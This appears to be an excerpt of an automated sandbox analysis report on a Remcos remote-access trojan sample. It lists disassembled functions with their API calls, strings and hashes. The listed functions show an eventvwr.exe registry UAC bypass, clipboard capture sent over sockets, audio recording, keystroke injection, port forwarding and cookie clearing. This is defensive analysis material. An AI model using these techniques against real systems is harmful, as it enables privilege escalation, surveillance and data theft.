                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                          • String ID: H"G$H"G
                                                                                          • API String ID: 3795512280-1424798214
                                                                                          • Opcode ID: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                                                                                          • Instruction ID: 85d6828eff9e87111454ffe40de9a07a949f8ec8799fb43d86416e8e02d17308
                                                                                          • Opcode Fuzzy Hash: 13e2dbf3d5e885c0786faa6bc9ba80587d0ab8a2a4bc2c59858fca73f58dbc4d
                                                                                          • Instruction Fuzzy Hash: 9D513D712043015BCB14BB72C9A6ABF76999F90308F00453FB946B72E3DF7D9D09869A
                                                                                          Function 004530E4 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004541DF), ref: 00453107
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecodePointer
                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                          • API String ID: 3527080286-3064271455
                                                                                          • Opcode ID: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                          • Instruction ID: 9333e61b372fbf41addd7e909d3efe481a8fa84217f9852f3907f1ba123c2b47
                                                                                          • Opcode Fuzzy Hash: f53d904abd5658a060f413a89978d0306c3294a3021a30185663c10ae64f840c
                                                                                          • Instruction Fuzzy Hash: CC518F30900909DBCF10DFA8E9480ADBBB0FF0A347F644196EC81A7216CB799A1DDB1D
                                                                                          Function 004159BA Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00415A1A
                                                                                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                                                                          • Sleep.KERNEL32(00000064), ref: 00415A46
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00415A7A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                          • API String ID: 1462127192-2001430897
                                                                                          • Opcode ID: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                                                                          • Instruction ID: 7fbd65b43d39327dc9f625a99f058064c4c6325298edc9245ab65683dcac2845
                                                                                          • Opcode Fuzzy Hash: c216d361bb9ef99ebd7f865ddf1f7fdade912dea526e25dca7a569b2ba1e0d71
                                                                                          • Instruction Fuzzy Hash: FA315E719402199ACB04FBA1DC96DEE7768EF50308F40017FF506731E2EE785E8ACA99
                                                                                          Function 004066A6 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 00406775
                                                                                          • ExitProcess.KERNEL32 ref: 00406782
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExecuteExitProcessShell
                                                                                          • String ID: H"G$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                                                                          • API String ID: 1124553745-1488154373
                                                                                          • Opcode ID: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                                                                          • Instruction ID: 062031feec86e4e4641db6525c6f69cb17b792298443eef288e26788f9a4eac4
                                                                                          • Opcode Fuzzy Hash: 8e5fad59d86c60b71b0e885ed10285bbf14514be7c7ad01d69b843f0820051ef
                                                                                          • Instruction Fuzzy Hash: 36110571A4420166D704B7A2DC57FEF32689B10B09F50003FF906B61D2EEBC5A4982DE
                                                                                          Function 0041AA4F Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 53memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • AllocConsole.KERNEL32(00000001), ref: 0041AA5D
                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041AA76
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocConsoleShowWindow
                                                                                          • String ID: * BreakingSecurity.net$ * Remcos v$--------------------------$--------------------------$3.8.0 Pro$CONOUT$
                                                                                          • API String ID: 4118500197-4025029772
                                                                                          • Opcode ID: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                          • Instruction ID: 07661f9972e693547954b0fc743ee20e91627884e026026f5b86345d1a8b50cd
                                                                                          • Opcode Fuzzy Hash: 613498324cd6a8c522b436d369b4391aab2e08fe6d6e431343eccbd2d6afca2c
                                                                                          • Instruction Fuzzy Hash: CE015271D803586ADB10EBF59C06FDF77AC6B18708F54142BB100A7095E7FC950C4A2D
                                                                                          Function 0041B212 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041B22B
                                                                                            • Part of subcall function 0041B2C4: RegisterClassExA.USER32(00000030), ref: 0041B310
                                                                                            • Part of subcall function 0041B2C4: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041B32B
                                                                                            • Part of subcall function 0041B2C4: GetLastError.KERNEL32 ref: 0041B335
                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041B262
                                                                                          • lstrcpynA.KERNEL32(00471AF8,Remcos,00000080), ref: 0041B27C
                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00471AE0), ref: 0041B292
                                                                                          • TranslateMessage.USER32(?), ref: 0041B29E
                                                                                          • DispatchMessageA.USER32(?), ref: 0041B2A8
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041B2B5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                          • String ID: Remcos
                                                                                          • API String ID: 1970332568-165870891
                                                                                          • Opcode ID: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                          • Instruction ID: 392c2ce23d615fe7cfca65c1bdf78dc563e79c4ff08160ae13be93183ad442b8
                                                                                          • Opcode Fuzzy Hash: 6a629144b245819b38f2933f29616ef2380529a0a937335efbac9e54df28edc4
                                                                                          • Instruction Fuzzy Hash: CD013971901308ABCB10DBB9ED4EEDB7BBCFB85B05F40417AF51992061D7B89489CB68
                                                                                          Function 00449F63 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                                                                          • Instruction ID: 53180985ac70b1d9c95f382170f9691aec8243d5c40cf1d2be039b65846bfc46
                                                                                          • Opcode Fuzzy Hash: d7410a98b278d9d25d0fcdc47fb7c960ad5f7d9b58d6d06d1c87314e37a5ed65
                                                                                          • Instruction Fuzzy Hash: 2DC12970D44245AFEB11DFA8D841BEEBBB0BF19304F04419AE844A7392C7798D51DB6B
                                                                                          Function 00450F63 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 0045100F
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00451092
                                                                                          • __alloca_probe_16.LIBCMT ref: 004510CA
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451125
                                                                                          • __alloca_probe_16.LIBCMT ref: 00451174
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0045113C
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004511B8
                                                                                          • __freea.LIBCMT ref: 004511E3
                                                                                          • __freea.LIBCMT ref: 004511EF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                          • String ID:
                                                                                          • API String ID: 201697637-0
                                                                                          • Opcode ID: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
                                                                                          • Instruction ID: 005ec385ace484c3041e352596739c7debf7d66643145b34d09858c349e559c3
                                                                                          • Opcode Fuzzy Hash: 6ebe38f30125ab260d7bf90636684c5f617b7255880676fca2bd247c862c4a42
                                                                                          • Instruction Fuzzy Hash: C191D632E002169BDB209EA5C881BAF7BB59F09716F14025BED00E7292D72DDD89C768
                                                                                          Function 0044268B Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                                                                                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                                                                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                                                                                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                                                                          • _memcmp.LIBVCRUNTIME ref: 00442935
                                                                                          • _free.LIBCMT ref: 004429A6
                                                                                          • _free.LIBCMT ref: 004429BF
                                                                                          • _free.LIBCMT ref: 004429F1
                                                                                          • _free.LIBCMT ref: 004429FA
                                                                                          • _free.LIBCMT ref: 00442A06
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                          • String ID: C
                                                                                          • API String ID: 1679612858-1037565863
                                                                                          • Opcode ID: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
                                                                                          • Instruction ID: aeaf983377083d43a1268bd0837f448671c9c2270315b144058cc99b7af0bbb4
                                                                                          • Opcode Fuzzy Hash: 3cd607daeafeb172cd12d40b3ef98e411c3f82b6d125e495381489309ccb8190
                                                                                          • Instruction Fuzzy Hash: C6B14B75A01219DFEB24DF19C984AAEB7B4FF08314F5045AEE849A7350E774AE90CF44
                                                                                          Function 00413360 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: tcp$udp
                                                                                          • API String ID: 0-3725065008
                                                                                          • Opcode ID: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                          • Instruction ID: 0146648cb9627796ba72a5075a1bb19f593c332394d5faf8ede73001e6eead87
                                                                                          • Opcode Fuzzy Hash: 688bcc682103751b5d6e0fc50f4ff73081394bc5db4df513150874dffde81862
                                                                                          • Instruction Fuzzy Hash: 0271AB306083029FDB24CF55C4456ABBBE5AB88B06F14483FF88587351DB78CE85CB8A
                                                                                          Function 0040FF5A Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Eventinet_ntoa
                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                          • API String ID: 3578746661-168337528
                                                                                          • Opcode ID: e2fddcd864f1b862c8bd6a30b96e8862d45d519ccfdedf39a86f43d26816717a
                                                                                          • Instruction ID: 6b7c77c2de925f44c7fd0444b04eaa142d1c015a05a303cede5520b91582e870
                                                                                          • Opcode Fuzzy Hash: e2fddcd864f1b862c8bd6a30b96e8862d45d519ccfdedf39a86f43d26816717a
                                                                                          • Instruction Fuzzy Hash: 1B51C671A043005BC704FB35E81AAAE36A56B85304F50453FF942972E2EFBD998987CF
                                                                                          Function 004069F4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00471E78,00462F54,?,00000000,0040708D,00000000), ref: 00406A56
                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406A9E
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,0040708D,00000000,?,?,0000000A,00000000), ref: 00406ADE
                                                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 00406AFB
                                                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B26
                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00406B36
                                                                                            • Part of subcall function 00404B76: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,00404C29,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404B85
                                                                                            • Part of subcall function 00404B76: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040546B), ref: 00404BA3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                          • String ID: .part
                                                                                          • API String ID: 1303771098-3499674018
                                                                                          • Opcode ID: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                                                                          • Instruction ID: 678cfffe15af58d7f0b712f13b91f409224560124cae5e22a1f642ab954cf825
                                                                                          • Opcode Fuzzy Hash: b311657231bfd1ddbcc4a820267832357b1505ed209a9d42b0dbde4102a0be9c
                                                                                          • Instruction Fuzzy Hash: 183195715043519FC210FF61D8859AFB7E8EF84305F40493FB946A21E1DB78DE488B9A
                                                                                          Function 00446FC4 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0043E2F6,0043E2F6,?,?,?,00447215,00000001,00000001,80E85006), ref: 0044701E
                                                                                          • __alloca_probe_16.LIBCMT ref: 00447056
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00447215,00000001,00000001,80E85006,?,?,?), ref: 004470A4
                                                                                          • __alloca_probe_16.LIBCMT ref: 0044713B
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,80E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044719E
                                                                                          • __freea.LIBCMT ref: 004471AB
                                                                                            • Part of subcall function 00443649: RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                                                                          • __freea.LIBCMT ref: 004471B4
                                                                                          • __freea.LIBCMT ref: 004471D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3864826663-0
                                                                                          • Opcode ID: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                                                                          • Instruction ID: 54c76e5b98bc3e662f405ec50a570bffd16f8396d3d33e450f7b83ec1f761fab
                                                                                          • Opcode Fuzzy Hash: 04037ebd5a1a4f50f5415f33d7545ea1837db620aa2cb0a216d5dedd30da5abc
                                                                                          • Instruction Fuzzy Hash: C051F372604216AFFB258F65CC81EAF77A9EB44754F19422EFC04D6340EB38DC4296A8
                                                                                          Function 00417949 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417982
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179A3
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179C3
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179D7
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004179ED
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A0A
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00417A25
                                                                                          • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00417A41
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InputSend
                                                                                          • String ID:
                                                                                          • API String ID: 3431551938-0
                                                                                          • Opcode ID: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                          • Instruction ID: 18205c9a4f61e0979ba7f31da2e0396e133b47f61cec1eebe1044e0c870e5742
                                                                                          • Opcode Fuzzy Hash: 6aaf5890e5c1829a4f0a9f9de961f2057ca44ae286fc2f2a8f4f79c9cdb01491
                                                                                          • Instruction Fuzzy Hash: BF3180715583086EE311CF51D941BEBBFECEF99B54F00080FF6809A191D2A696C98BA7
                                                                                          Function 00414F40 Relevance: 12.0, APIs: 8, Instructions: 49clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 00414F41
                                                                                          • EmptyClipboard.USER32 ref: 00414F4F
                                                                                          • CloseClipboard.USER32 ref: 00414F55
                                                                                          • OpenClipboard.USER32 ref: 00414F5C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                                          • CloseClipboard.USER32 ref: 00414F84
                                                                                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                          • String ID:
                                                                                          • API String ID: 2172192267-0
                                                                                          • Opcode ID: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                                                                          • Instruction ID: b342c93700c1c5b5557293b3c64df63ecfc3f94f93ee8c928ebb46f035b43356
                                                                                          • Opcode Fuzzy Hash: 828cfcc74c82ea041a7dd29e4e1c173cc2e20efda03bf5817e1bab7b2f8bf981
                                                                                          • Instruction Fuzzy Hash: 7C015E312443009BD314BF71DC596AA76A8EBE0346F81057EB94A931A3DF3899498A9A
                                                                                          Function 00447757 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00447ECC,00453EB5,00000000,00000000,00000000,00000000,00000000), ref: 00447799
                                                                                          • __fassign.LIBCMT ref: 00447814
                                                                                          • __fassign.LIBCMT ref: 0044782F
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00447855
                                                                                          • WriteFile.KERNEL32(?,00000000,00000000,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 00447874
                                                                                          • WriteFile.KERNEL32(?,00453EB5,00000001,00447ECC,00000000,?,?,?,?,?,?,?,?,?,00447ECC,00453EB5), ref: 004478AD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                          • String ID:
                                                                                          • API String ID: 1324828854-0
                                                                                          • Opcode ID: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                          • Instruction ID: 74b5e8c6f427b63fe2026e60454d3d85c0c1d9029b0a2cc1a9ecb7a500eaa1fe
                                                                                          • Opcode Fuzzy Hash: a748b16374f527b7a80cf69ed727348adf3f69da4df0249be72511d103bd3332
                                                                                          • Instruction Fuzzy Hash: 32510870E042499FEB10DFA8DC85AEEBBF8EF09300F14416BE951E7291E7749941CB69
                                                                                          Function 00453DF4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free
                                                                                          • String ID: $-E$$-E
                                                                                          • API String ID: 269201875-3140958853
                                                                                          • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                                          • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                                                                          • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                                                                          • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                                                                          Function 00401CEB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _strftime.LIBCMT ref: 00401D30
                                                                                            • Part of subcall function 00401A4D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                                                                          • waveInUnprepareHeader.WINMM(0046FA78,00000020,00000000,?), ref: 00401DE2
                                                                                          • waveInPrepareHeader.WINMM(0046FA78,00000020), ref: 00401E20
                                                                                          • waveInAddBuffer.WINMM(0046FA78,00000020), ref: 00401E2F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                          • String ID: %Y-%m-%d %H.%M$.wav
                                                                                          • API String ID: 3809562944-3597965672
                                                                                          • Opcode ID: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                                                                          • Instruction ID: eb6f517cf981021e41f9baa65c06222081641aa24e02a1e4c78245b08a68fc14
                                                                                          • Opcode Fuzzy Hash: b10e30c525f246f4611f68b91188478031edfba2b9a6cbdc9954c4cf903c77cf
                                                                                          • Instruction Fuzzy Hash: 743150315043009BC314EBA1EC56A9E77E8FB54318F50893EF599A21F2EFB49909CB5E
                                                                                          Function 0040AE2A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00411F91: RegOpenKeyExA.ADVAPI32(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                                                            • Part of subcall function 00411F91: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                                                            • Part of subcall function 00411F91: RegCloseKey.ADVAPI32(?), ref: 00411FDD
                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040AEAC
                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040AEB9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_18_2_400000_myTuDsvNcebev.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                          • API String ID: 1133728706-4073444585
